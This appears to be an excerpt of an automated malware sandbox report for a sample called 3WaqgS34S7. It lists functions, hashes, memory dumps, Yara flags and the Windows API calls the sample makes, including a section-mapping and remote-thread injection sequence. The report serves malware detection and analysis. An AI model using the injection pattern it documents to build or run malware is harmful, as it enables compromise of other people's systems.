Instruction ID: 48cf68dea9b2a59aff0bd1375967132417f13dea447a5c22fb522c1754ab9dfb
Opcode Fuzzy Hash: 159ef1356bc4d3fb845f8cadcbfe975d415d6528c97521bf2350dfc02ddf3471
Instruction Fuzzy Hash: 0FE1E0764051C2AAE7627A34475C58FFB60E912FE231C4ABBC4803BBC6D2FE5C25964D

Function 0040227B Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1740990116.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3WaqgS34S7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a54127a6e011bd9a6492e942a392b69cb0db3b4479285b61c62e9c2c3931af5
Instruction ID: 31bd91d00bda3e8b880a46313300f3a6432f85cd5b4315b15ba9c8d6998c73ae
Opcode Fuzzy Hash: 2a54127a6e011bd9a6492e942a392b69cb0db3b4479285b61c62e9c2c3931af5
Instruction Fuzzy Hash: 9D318DF959518ABEC3834AF2D847AD17F65A90727030E8096F144AB963F2E2D203D345

Function 00401545 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1740990116.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3WaqgS34S7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4b0eba4674c88781440163affe539fc83036850b72e000e994f22a690ddd9f8
Instruction ID: f15b5a85529e3cdc7f12a60dbda4286a3027e8457a7aafd52592071893ae7f15
Opcode Fuzzy Hash: c4b0eba4674c88781440163affe539fc83036850b72e000e994f22a690ddd9f8
Instruction Fuzzy Hash: E9113B62B1D241A7D31796A08D46469BB60EB42390F784C7BD1437E5F3E17B9802968F

Function 009F0216 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1741605367.00000000009ED000.00000040.00000020.00020000.00000000.sdmp, Offset: 009ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9ed000_3WaqgS34S7.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: c2f9fd2d3d37fa986efd3481549fc921552aca60e2af56b79b9001c0e8cd2f9b
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: E1115772340104AFDB54DE95DCC5FE673EEEBC9360B298065EA18CB316E679E802C760

Function 00401551 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1740990116.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3WaqgS34S7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95d82b58192d50a7ece4916ac66a8a27f0b3f0fc2909334f595ecbe4bb99dafd
Instruction ID: 05b3ec7c0d492939e8eb46500ed78428febff86fdec0977110a008e66ced60c8
Opcode Fuzzy Hash: 95d82b58192d50a7ece4916ac66a8a27f0b3f0fc2909334f595ecbe4bb99dafd
Instruction Fuzzy Hash: CF113B62B0D2419BD3075AA08D065597B60DB52390F384CBBD0437E5F3E17B5802968F

Function 00401563 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1740990116.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3WaqgS34S7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f552beb58d2735dad5636f8d78d2aeb50cd881c8ffdce0193ec9cf3386f8fcc8
Instruction ID: 0d25c83d3b8eb7300d73d6a7a78f19c27339fca208002655f9a92b44dec9f206
Opcode Fuzzy Hash: f552beb58d2735dad5636f8d78d2aeb50cd881c8ffdce0193ec9cf3386f8fcc8
Instruction Fuzzy Hash: 17113D62B19241A7D31796A08D024697B60EB42390F784C77D5437E5F3E17F9802968F

Function 00401582 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1740990116.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3WaqgS34S7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b699132e8fda705e56b4f0f65e0ab04ca49bb388a0a6ba3d09e8b7f405a0f4df
Instruction ID: dbc59df0cf02951115fe61769f6947e1a5e5116725621be0b0e1622a31ca7ba8
Opcode Fuzzy Hash: b699132e8fda705e56b4f0f65e0ab04ca49bb388a0a6ba3d09e8b7f405a0f4df
Instruction Fuzzy Hash: 81016D63F152525BD31B5BA0CD06059FF60E6123A07789DABD041AB4F3D13B98019BCD

Function 0040158C Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1740990116.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3WaqgS34S7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 993b6a335257e3c8cc5998be700c3bc7f1dd5ae5108862d4fad162cca8e38f7c
Instruction ID: 80f50c41194a952b2da06f43203cafc51480363042ee59ffb0d482171aeed636
Opcode Fuzzy Hash: 993b6a335257e3c8cc5998be700c3bc7f1dd5ae5108862d4fad162cca8e38f7c
Instruction Fuzzy Hash: 1F016D63B1925257D31B5AA08906099BB60EA02390B789CABD142AA4F3E13B98015B8D

Function 009A0D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1741369636.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_3WaqgS34S7.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: 43d476f9e52ea25558a992f812c5776147770944331b17c4095a204db68389ec
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: BA01A277A016048FDF21DF64C808BAA33E9EBC7316F5544A9D90A9B281E774AD418FD0

Function 00401590 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1740990116.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3WaqgS34S7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be4afb068ff270ef1e21a8d4e7f6584ca575292f68bcb19b5b1fefa61e6e2834
Instruction ID: 2e38c36894ac425607d4ebd065e334a5a0685f06b500dbf4cb2d65a6db31ab9c
Opcode Fuzzy Hash: be4afb068ff270ef1e21a8d4e7f6584ca575292f68bcb19b5b1fefa61e6e2834
Instruction Fuzzy Hash: C6017063F1525157D31B5AE0C902049BF64D6033A07785DA7D151974F3E23B980147CC

Function 00401617 Relevance: .0, Instructions: 25nativeCOMMON

Download Yara Rule

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002,?,0000000C), ref: 0040170E
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,0000000C), ref: 0040173B
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040175E

Memory Dump Source

Source File: 00000000.00000002.1740990116.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3WaqgS34S7.jbxd

Similarity

API ID: Section$CreateDuplicateObjectView
String ID:
API String ID: 1652636561-0
Opcode ID: 7a99cf4006d0a555f1b19d7261e81f119d729c9eda5ea828f42bafe4da3262cb
Instruction ID: 3180e42d2d8fede0b632eaee127032e2f37c429ee0faaffde0d3c4d07bd1809c
Opcode Fuzzy Hash: 7a99cf4006d0a555f1b19d7261e81f119d729c9eda5ea828f42bafe4da3262cb
Instruction Fuzzy Hash: C4E02B73B151429BC31F6A90CD424A9BF64D6033D47B94CB7A102AE8F7D27B5C015B8C

Analysis Process: vdhivcvPID: 6764, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	6.7%
Dynamic/Decrypted Code Coverage:	17.5%
Signature Coverage:	0%
Total number of Nodes:	177
Total number of Limit Nodes:	8

Executed Functions

Function 00401546 Relevance: 10.8, APIs: 7, Instructions: 295
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.1983080640.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vdhivcv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cd5c1709ac7b711dbdb46d56fa3852b59184e0f4001c1450d715fc554d72dd0
Instruction ID: 8966994f51f5220269a050c3a05b0be66836dc0e2615c8264cabc048db8ca459
Opcode Fuzzy Hash: 6cd5c1709ac7b711dbdb46d56fa3852b59184e0f4001c1450d715fc554d72dd0
Instruction Fuzzy Hash: 13A126B1A04204FBDB219F91CC45FAF7BB8EF81750F24446BF542BA1E1D2799901CB5A

Function 00401652 Relevance: 10.7, APIs: 7, Instructions: 181
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002,?,0000000C), ref: 0040170E
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,0000000C), ref: 0040173B
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040175E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040177C
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,0000000C), ref: 004017BD
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004017EE
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401810

Memory Dump Source

Source File: 00000005.00000002.1983080640.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vdhivcv.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 769cff3db2a16ff9947aca2e1bc7df02427bdea62afa969ed6e84abdacd5d8fb
Instruction ID: 08707dfce16203c79c186cea6ac9f890c639e5fa9aae9c39073b6eac8e5c48a5
Opcode Fuzzy Hash: 769cff3db2a16ff9947aca2e1bc7df02427bdea62afa969ed6e84abdacd5d8fb
Instruction Fuzzy Hash: B0514DB4900244BFEB209F91CC49FEFBBB8EF85B00F14012AF951BA1E5D6759945CB64

Function 0040165E Relevance: 10.7, APIs: 7, Instructions: 175
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002,?,0000000C), ref: 0040170E
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,0000000C), ref: 0040173B
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040175E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040177C
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,0000000C), ref: 004017BD
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004017EE
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401810

Memory Dump Source

Source File: 00000005.00000002.1983080640.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vdhivcv.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 8d2ab844faf546b4f5f52a9945f897ad4b2d557e0515ebb43b3a700dc4ab6994
Instruction ID: d82c1138886ff24aec3403b45069446d704daea90aca27dc33efe5e37eb28e93
Opcode Fuzzy Hash: 8d2ab844faf546b4f5f52a9945f897ad4b2d557e0515ebb43b3a700dc4ab6994
Instruction Fuzzy Hash: B8514BB1900244BFEB208F91CC48FAFBBB8EF85B00F14016AF951BA2E5D6759905CB64

Function 0040166A Relevance: 10.7, APIs: 7, Instructions: 175
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002,?,0000000C), ref: 0040170E
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,0000000C), ref: 0040173B
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040175E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040177C
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,0000000C), ref: 004017BD
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004017EE
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401810

Memory Dump Source

Source File: 00000005.00000002.1983080640.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vdhivcv.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 1ea370aaa42164f932e49b278ceee8f942154ee2d8d32f83138b8784e9761f6c
Instruction ID: 6d453cfa5274170bfbdae373e5c1c9b429e4ee8d346c6281ffbd38a208f90e25
Opcode Fuzzy Hash: 1ea370aaa42164f932e49b278ceee8f942154ee2d8d32f83138b8784e9761f6c
Instruction Fuzzy Hash: FF513AB4900245BBEB208F91CC48FAFBBB8EF85B00F14016AF951BA2E4D6759945CB64

Function 00401691 Relevance: 10.7, APIs: 7, Instructions: 160
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002,?,0000000C), ref: 0040170E
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,0000000C), ref: 0040173B
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040175E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040177C
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,0000000C), ref: 004017BD
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004017EE
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401810

Memory Dump Source

Source File: 00000005.00000002.1983080640.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vdhivcv.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 95d62bb5d2fb3017c69896b09fd0c8dd1b8bc5303f582cbfad1cf34534ba11e6
Instruction ID: a4aae6b86718a9dceeda142fe4c9f3d337048079e59506af87c2624b4c8528a1
Opcode Fuzzy Hash: 95d62bb5d2fb3017c69896b09fd0c8dd1b8bc5303f582cbfad1cf34534ba11e6
Instruction Fuzzy Hash: 535108B5900249BBEF209F91CC48FEFBBB8EF85B10F104169F951AA2A5D7709944CB64

Function 00403135 Relevance: 3.2, APIs: 2, Instructions: 167
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 0040325D
NtTerminateProcess.NTDLL ref: 0040326E

Memory Dump Source

Source File: 00000005.00000002.1983080640.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vdhivcv.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: 88e323ebcc8cfc6628e15868eb3694d16e1535974f295d677a4f92b6fbc021e4
Instruction ID: ea6061ee1c3098f13e0f7a0edf0e04afb299d666a4a386905c82e4678c4decca
Opcode Fuzzy Hash: 88e323ebcc8cfc6628e15868eb3694d16e1535974f295d677a4f92b6fbc021e4
Instruction Fuzzy Hash: 5B412632618E084FD768EF6CA84966277D6E798311B2643AED808D7385EE30D85183C5

Function 0040327E Relevance: 3.1, APIs: 2, Instructions: 114
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.1983080640.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vdhivcv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6b5d4aa042eeb9fc5c67cc315633b6bcdb668e3db296512d28d2684d4bbfc7d
Instruction ID: f85e0e2fc3bef3d1689db4ef00eb6110e2ec86435fc76eaec67dd06365047321
Opcode Fuzzy Hash: e6b5d4aa042eeb9fc5c67cc315633b6bcdb668e3db296512d28d2684d4bbfc7d
Instruction Fuzzy Hash: 4C315D7180C2848FD714DFA898C63677FA4EF15316F2804FFD88567392D6399605978B

Function 009A003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 009A024D

Strings

cess, xrefs: 009A018D
kernel32.dll, xrefs: 009A008F, 009A0095

Memory Dump Source

Source File: 00000005.00000002.1983346956.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_9a0000_vdhivcv.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 1a343bfe23284ccad9c55bbd4bc15e529e1d6f2517d0bc10554711d8a12dd09a
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 8D527874A00229DFDB64CF68C984BACBBB1BF49304F1480D9E94DAB251DB34AE94DF54

Function 0041BD30 Relevance: 4.6, APIs: 3, Instructions: 60
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00806520), ref: 0041BE0C
GetProcAddress.KERNEL32(00000000,00420B08), ref: 0041BE49
VirtualProtect.KERNELBASE(00806364,0080651C,00000040,?), ref: 0041BE69

Memory Dump Source

Source File: 00000005.00000002.1983099018.000000000040F000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_40f000_vdhivcv.jbxd

Similarity

API ID: AddressHandleModuleProcProtectVirtual
String ID:
API String ID: 2099061454-0
Opcode ID: b73ac9cb225b51c4fd3d0c368e28526717c9643879deb31053f81edd332f6925
Instruction ID: c95171ec45ed043d524413fa4937ecd1da42087480964d5970ea1364d67dfc6c
Opcode Fuzzy Hash: b73ac9cb225b51c4fd3d0c368e28526717c9643879deb31053f81edd332f6925
Instruction Fuzzy Hash: AB31C024718781CAE361DBA4FC457113EE2BB6A708F44506C9184873FAF3BA5535C76E

Function 00A7F629 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00A7F651
Module32First.KERNEL32(00000000,00000224), ref: 00A7F671

Memory Dump Source

Source File: 00000005.00000002.1983485699.0000000000A7C000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A7C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a7c000_vdhivcv.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 63daa0472ec49498760be9c3f2991bcfeedb7ab3e3cc0e17fc8813642237e36a
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: EDF0F6315007506FD7203BF59C8DFAE76ECAF48320F108538E64A910D0DB70EE054A60

Function 009A0E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,009A0223,?,?), ref: 009A0E19
SetErrorMode.KERNELBASE(00000000,?,?,009A0223,?,?), ref: 009A0E1E

Memory Dump Source

Source File: 00000005.00000002.1983346956.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_9a0000_vdhivcv.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: d8bb08acbce6a36e491080eca6a53d73b7e546759d24ac258b579eee218141b3
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 8AD0123114512877DB402A94DC09BCD7B1CDF09B62F108411FB0DD9080C770994046E5

Function 0041BE70 Relevance: 1.5, APIs: 1, Instructions: 27
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNELBASE(00806520,0041C3E3), ref: 0041BEFE

Memory Dump Source

Source File: 00000005.00000002.1983099018.000000000040F000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_40f000_vdhivcv.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 0a15243abbb77dc1b97bfc58dabe9b54cb40a51112934ec330926107e8d3d963
Instruction ID: da6e4b38e2470e7c04c496aabc0c9d80adc5fe69ae97a20b7dcc95448944ea40
Opcode Fuzzy Hash: 0a15243abbb77dc1b97bfc58dabe9b54cb40a51112934ec330926107e8d3d963
Instruction Fuzzy Hash: F8F06234729242C6E784DB64FD517112A22FF6EB00F10642A9109CB7F8F6BA8931C71E

Function 00401A23 Relevance: 1.3, APIs: 1, Instructions: 60
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401A76

Part of subcall function 00401652: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002,?,0000000C), ref: 0040170E
Part of subcall function 00401652: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,0000000C), ref: 0040173B

Memory Dump Source

Source File: 00000005.00000002.1983080640.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vdhivcv.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 4a6ab7f2a7f3b1899ba0f8ed2be186294e385831c40161cfa846fbc6bea8b304
Instruction ID: 91b5110070e0c44bf95986206989ec6c2ce5463c47e088f607755108aacdec66
Opcode Fuzzy Hash: 4a6ab7f2a7f3b1899ba0f8ed2be186294e385831c40161cfa846fbc6bea8b304
Instruction Fuzzy Hash: 51018E3530E204E7DB00AA908D81E7B3268EB41354F2041B7B603751F1D53D9A136F2F

Function 00401A2F Relevance: 1.3, APIs: 1, Instructions: 53
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401A76

Part of subcall function 00401652: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002,?,0000000C), ref: 0040170E
Part of subcall function 00401652: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,0000000C), ref: 0040173B

Memory Dump Source

Source File: 00000005.00000002.1983080640.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vdhivcv.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: cf572ce4c71145162733ed5eae8eac49e4cb303809c2186d68ef726cba448547
Instruction ID: 0602fc03d50bbbe6fc42af46552b92fff0d4f1b5710024386572b4c46d7e865f
Opcode Fuzzy Hash: cf572ce4c71145162733ed5eae8eac49e4cb303809c2186d68ef726cba448547
Instruction Fuzzy Hash: 5001963670A244EBDB01AA91CD91FAA3378DB44314F2441B7B613751F2D63D9A13AF1B

Function 00A7F2E8 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00A7F339

Memory Dump Source

Source File: 00000005.00000002.1983485699.0000000000A7C000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A7C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a7c000_vdhivcv.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: b0eae3ed3dab763f16c39854a2df72d6acd42be6f85b6ce743c80768527dcc3c
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 8F112D79A00208FFDB01DF98C985E98BBF5AF08350F15C0A4F9489B361D371EA50DB90

Function 00401A54 Relevance: 1.3, APIs: 1, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401A76

Part of subcall function 00401652: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002,?,0000000C), ref: 0040170E
Part of subcall function 00401652: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,0000000C), ref: 0040173B

Memory Dump Source

Source File: 00000005.00000002.1983080640.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vdhivcv.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 396eb1de65484f458ea31e8b5f0b6f3a394b8df51d3751b13c73184ee183ca9d
Instruction ID: cc39f782a2c04dae7e3acb03cf37aaca09712356619e57787449d6207a1c97e1
Opcode Fuzzy Hash: 396eb1de65484f458ea31e8b5f0b6f3a394b8df51d3751b13c73184ee183ca9d
Instruction Fuzzy Hash: 0F01A736745244E7DB00AA948C82EAA3774DB41314F2445B7F613B51E2D63D89136F1B

Non-executed Functions

Function 0041C110 Relevance: 37.8, APIs: 25, Instructions: 297timememorythreadCOMMON

Download Yara Rule

APIs

GetStringTypeA.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 0041C1F6
BuildCommDCBW.KERNEL32(00000000,00000000), ref: 0041C1FE
GetTimeFormatA.KERNEL32(00000000,00000000,?,0041E30C,?,00000000), ref: 0041C230
SetThreadAffinityMask.KERNEL32(00000000,00000000), ref: 0041C238
GetConsoleAliasExesLengthA.KERNEL32 ref: 0041C23E
OpenWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 0041C247
GetProcessHandleCount.KERNEL32(00000000,00000000), ref: 0041C24F
GetLocaleInfoW.KERNEL32(00000000,00000000,?,00000000), ref: 0041C260
GlobalAlloc.KERNEL32(00000000,00000000), ref: 0041C268
InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 0041C2A1
GetSystemWindowsDirectoryW.KERNEL32(?,00000000), ref: 0041C2B0
WriteConsoleA.KERNEL32(00000000,?,00000000,?,00000000), ref: 0041C2C3
GetModuleHandleA.KERNEL32(00000000), ref: 0041C2CA
